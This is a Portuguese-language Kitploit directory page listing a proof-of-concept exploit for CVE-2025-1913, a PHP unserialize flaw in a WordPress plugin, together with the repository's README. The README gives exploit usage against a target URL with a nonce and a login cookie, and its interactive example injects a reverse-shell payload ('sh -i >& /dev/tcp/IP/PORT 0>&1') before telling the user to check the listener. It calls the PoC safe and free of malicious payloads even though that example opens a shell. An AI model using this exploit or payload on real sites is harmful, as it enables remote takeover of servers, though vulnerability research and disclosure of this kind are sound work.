Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-1913-PoC — Um PoC demonstrando CVE-2025-1913, mostrando como o manuseio inseguro de unserialize do plugin pode levar a comportamento de alto impacto em ambientes controlados. Contém um payload prejudicial apenas para testes autorizados. Use estritamente em laboratórios isolados e para pesquisa defensiva. | Kitploit
Ferramentas/GitHubGitHub/s0haib518-ksa/cve-2025-1913-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubs0haib518-ksa/cve-2025-1913-poc

CVE-2025-1913-PoC

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
21há 8 mesesAinda não revisado

Sobre

Um PoC demonstrando CVE-2025-1913, mostrando como o manuseio inseguro de unserialize do plugin pode levar a comportamento de alto impacto em ambientes controlados. Contém um payload prejudicial apenas para testes autorizados. Use estritamente em laboratórios isolados e para pesquisa defensiva.

Compartilhar

CVE-2025-1913 -- Prova de Conceito (PoC)

Este repositório contém uma Prova de Conceito (PoC) apenas educacional para CVE-2025-1913, criada por Suhaib518 🇸🇦. Esta PoC demonstra como uma entrada PHP serializada especialmente manipulada pode acionar lógica vulnerável em componentes afetados do WordPress. A PoC é segura e não inclui cargas maliciosas.

⚠️ Aviso: Esta PoC é apenas para aprendizado, pesquisa e testes de segurança defensiva. NÃO a use em servidores que você não possui ou para os quais não tem permissão explícita para testar.


📌 Visão Geral

A vulnerabilidade existe devido ao tratamento inseguro de dados PHP serializados em certos fluxos de trabalho de plugins do WordPress. Esta PoC mostra como um atacante poderia fornecer estruturas serializadas manipuladas que causam comportamento interno não intencional.

Este repositório inclui um script Python que:

  • Constrói objetos PHP serializados personalizados
  • Codifica-os para endpoints de exportação baseados em AJAX do WordPress
  • Envia uma requisição controlada para demonstrar o problema com segurança

📂 Arquivos neste Repositório

root@kitploit:~
.
├── CVE-2025-1913-PoC.py         # O script PoC criado por Suhaib518 KSA
└── README.md                    # Documentação

🚀 Uso

1. Instalar Requisitos

O script usa apenas módulos Python internos, exceto requests:

root@kitploit:~
pip install requests

2. Executar o script de exploit interativo

root@kitploit:~
python3 exploit.py \
  -c "Class" \
  -H "https://target.com" \
  --wp-nonce "1234567890" \
  --cookie "wordpress_logged_in=YOUR_COOKIE_HERE"

Você será questionado:

  • Quantas propriedades incluir
  • O nome/valor para cada propriedade

O script então as serializará, construirá uma requisição WordPress e a enviará.


✔️ Exemplo de Comando (Fluxo de Exploração Bem-sucedido)

Abaixo está um exemplo de comando demonstrando o uso com valores de exemplo (estes não são maliciosos, apenas mostram o processo):

root@kitploit:~
python3 exploit.py   -c "WP_User_Query"   -H "https://example.com"   --wp-nonce "89f1a2b3c4"   --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"

Exemplos de respostas para as perguntas interativas:

root@kitploit:~
[?] Quantas propriedades esta classe possui? 2
[?] Nome da propriedade #1: file
[?] Valor para 'file': shell.sh
[?] Nome da propriedade #2: shell
[?] Valor para 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1

O script então exibirá:

root@kitploit:~
[*] Sending request…
....Check the listener for the shell.

🛡️ Mitigação (Alto Nível)

  • Evite usar unserialize() em entradas não confiáveis
  • Valide todos os parâmetros de formulário e requisições AJAX
  • Mantenha os plugins atualizados
  • Use formatos de dados modernos como JSON em vez de serialização PHP

📜 Licença

Licença MIT.


🙌 Autor

Criado por Suhaib518 🇸🇦.

Baixar ferramenta